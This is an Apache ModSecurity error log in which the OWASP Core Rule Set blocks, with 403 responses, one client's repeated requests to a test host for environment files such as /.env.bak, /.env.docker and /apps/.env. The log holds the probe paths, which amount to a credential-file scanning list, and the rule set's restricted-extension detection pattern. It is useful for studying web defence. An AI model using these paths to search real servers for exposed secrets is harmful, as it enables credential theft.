[Tue Jan 21 15:16:52.637913 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z4-sVJI8RB7_o08OfB6JBwAAAAk"]
[Tue Jan 21 15:16:52.638381 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z4-sVJI8RB7_o08OfB6JBwAAAAk"]
[Tue Jan 21 15:16:55.177267 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z4-sV5I8RB7_o08OfB6JCAAAAAk"]
[Tue Jan 21 15:16:55.177732 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z4-sV5I8RB7_o08OfB6JCAAAAAk"]
[Tue Jan 21 15:16:55.178423 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z4-sV5I8RB7_o08OfB6JCAAAAAk"]
[Tue Jan 21 15:16:57.608812 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z4-sWZI8RB7_o08OfB6JCQAAAAk"]
[Tue Jan 21 15:16:57.609221 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z4-sWZI8RB7_o08OfB6JCQAAAAk"]
[Tue Jan 21 15:16:57.609727 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z4-sWZI8RB7_o08OfB6JCQAAAAk"]
[Tue Jan 21 15:17:41.390118 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-shdP2g1a8O8tMN8i_3AAAAA8"]
[Tue Jan 21 15:17:41.390488 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-shdP2g1a8O8tMN8i_3AAAAA8"]
[Tue Jan 21 15:17:41.390849 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-shdP2g1a8O8tMN8i_3AAAAA8"]
[Tue Jan 21 15:17:41.391270 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-shdP2g1a8O8tMN8i_3AAAAA8"]
[Tue Jan 21 15:17:44.142515 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-siNP2g1a8O8tMN8i_3QAAAA8"]
[Tue Jan 21 15:17:44.142835 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-siNP2g1a8O8tMN8i_3QAAAA8"]
[Tue Jan 21 15:17:44.143341 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-siNP2g1a8O8tMN8i_3QAAAA8"]
[Tue Jan 21 15:17:44.143781 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-siNP2g1a8O8tMN8i_3QAAAA8"]
[Tue Jan 21 15:17:46.778204 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-sitP2g1a8O8tMN8i_3gAAAA8"]
[Tue Jan 21 15:17:46.778599 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-sitP2g1a8O8tMN8i_3gAAAA8"]
[Tue Jan 21 15:17:46.778952 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-sitP2g1a8O8tMN8i_3gAAAA8"]
[Tue Jan 21 15:17:46.779431 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-sitP2g1a8O8tMN8i_3gAAAA8"]
[Tue Jan 21 15:17:47.140873 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-sixX999c-l2awnNPVYgAAAAI"]
[Tue Jan 21 15:17:47.140986 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-sixX999c-l2awnNPVYgAAAAI"]
[Tue Jan 21 15:17:47.141153 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-sixX999c-l2awnNPVYgAAAAI"]
[Tue Jan 21 15:17:47.141325 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z4-sixX999c-l2awnNPVYgAAAAI"]
[Tue Jan 21 15:17:49.362004 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z4-sjdP2g1a8O8tMN8i_3wAAAA8"]
[Tue Jan 21 15:17:49.362412 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z4-sjdP2g1a8O8tMN8i_3wAAAA8"]
[Tue Jan 21 15:17:49.362748 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z4-sjdP2g1a8O8tMN8i_3wAAAA8"]
[Tue Jan 21 15:17:49.614896 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-sjRX999c-l2awnNPVYwAAAAI"]
[Tue Jan 21 15:17:49.616453 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-sjRX999c-l2awnNPVYwAAAAI"]
[Tue Jan 21 15:17:49.616862 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-sjRX999c-l2awnNPVYwAAAAI"]
[Tue Jan 21 15:17:49.617424 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "Z4-sjRX999c-l2awnNPVYwAAAAI"]
[Tue Jan 21 15:17:52.112256 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z4-skNP2g1a8O8tMN8i_4AAAAA8"]
[Tue Jan 21 15:17:52.112656 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z4-skNP2g1a8O8tMN8i_4AAAAA8"]
[Tue Jan 21 15:17:52.113057 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z4-skNP2g1a8O8tMN8i_4AAAAA8"]
[Tue Jan 21 15:17:52.139991 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-skBX999c-l2awnNPVZAAAAAI"]
